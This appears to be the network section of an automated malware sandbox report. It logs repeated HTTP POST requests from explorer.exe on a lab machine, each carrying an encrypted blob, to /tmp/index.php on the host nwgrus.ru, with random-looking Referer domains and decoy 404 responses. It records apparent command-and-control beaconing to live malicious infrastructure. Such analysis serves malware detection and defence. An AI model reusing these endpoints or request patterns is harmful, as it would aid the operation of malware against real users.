                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.44975458.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:00.346709967 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://qkabdlcselvepu.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 279
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:00.346709967 CEST279OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5e 38 b1 f4
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu^8DJNpT;):jE_]W%L57KL=]-qM3bRsUL>v)Mw?fr],g%
                                                                      Oct 3, 2024 12:28:02.008135080 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:01 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.44975558.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:02.072351933 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://fboiokwqifnpfwwg.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 164
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:02.072388887 CEST164OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 4b 59 c4 b6
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuKY~O@H]HI*0H(7Zk(/mE
                                                                      Oct 3, 2024 12:28:04.226339102 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:03 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.44975658.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:04.241367102 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://cjlnjwyjoxyuf.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 174
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:04.241400003 CEST174OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 78 37 fa f1
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vux7$^RJj9]E7 zS&6G-.EE3U(?kb<D"z
                                                                      Oct 3, 2024 12:28:05.961652994 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:05 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.44975758.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:05.981570959 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://jvksadufkdlihaeq.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 275
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:05.981570959 CEST275OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 50 2a a5 9a
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuP*UA_<=P3a=@=jztn5]Zx<O21LCAPuX>2AOKECB#.~J6DinhI6*
                                                                      Oct 3, 2024 12:28:07.987464905 CEST137INHTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:07 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      21192.168.2.44975858.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:08.048866987 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ricjpvrheenoi.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 119
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:08.048922062 CEST119OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 3f 27 db 8f
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu?'UO[E0J^F1^|4t
                                                                      Oct 3, 2024 12:28:09.875607967 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:09 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      22192.168.2.44975958.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:09.907893896 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://uobogpxbvskdl.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 261
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:09.907931089 CEST261OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 53 1e f3 ea
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuSx+\VISoC[~/UW-BpO,XXi[Oz;!&+wO|+N2uhWKS}HIfW}q`>0l
                                                                      Oct 3, 2024 12:28:12.116727114 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:11 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      23192.168.2.44976058.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:12.127814054 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://vwmsjsqvwuhba.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 331
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:12.127844095 CEST331OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 72 3b c1 94
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vur;Q<UQ~9hD/:kMc~4s+?Tv w~A=yK2X|:]b.ZG:j#nL!;ay<"-
                                                                      Oct 3, 2024 12:28:14.089869976 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:13 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.44976158.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:14.097873926 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://kskrxgkqoed.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 190
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:14.097873926 CEST190OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3f 19 de ae
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vu?X_yBscl2x&#x&EY**OOO.{~U?G&=HsZ0]
                                                                      Oct 3, 2024 12:28:15.643258095 CEST189INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:15 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                      Data Ascii: #\6Y9l_m=rA


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.44976358.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:16.961728096 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://euceyfvfmeh.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 169
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:16.961728096 CEST169OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 52 02 cb bb
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA ,[k,vuRm-uoe8lSuXFGj_V6xz#";HaT?5]
                                                                      Oct 3, 2024 12:28:18.517016888 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:18 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.44976458.151.148.90802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Oct 3, 2024 12:28:18.525346994 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://qptrydkvolka.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 125
                                                                      Host: nwgrus.ru
                                                                      Oct 3, 2024 12:28:18.525366068 CEST125OUTData Raw: 3b 6e 54 64 f5 c9 19 22 db ad b5 77 04 05 7e cb 0b 0d cf 91 6f 02 e6 15 00 7d 0b 93 48 c6 c1 19 9c 5f c3 5c 75 64 20 11 98 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 51 3f c0 9d
                                                                      Data Ascii: ;nTd"w~o}H_\ud ? 9Yt M@NA -[k,vuQ?KGi~wl} u:2KW3
                                                                      Oct 3, 2024 12:28:20.066890955 CEST484INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Thu, 03 Oct 2024 10:28:19 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
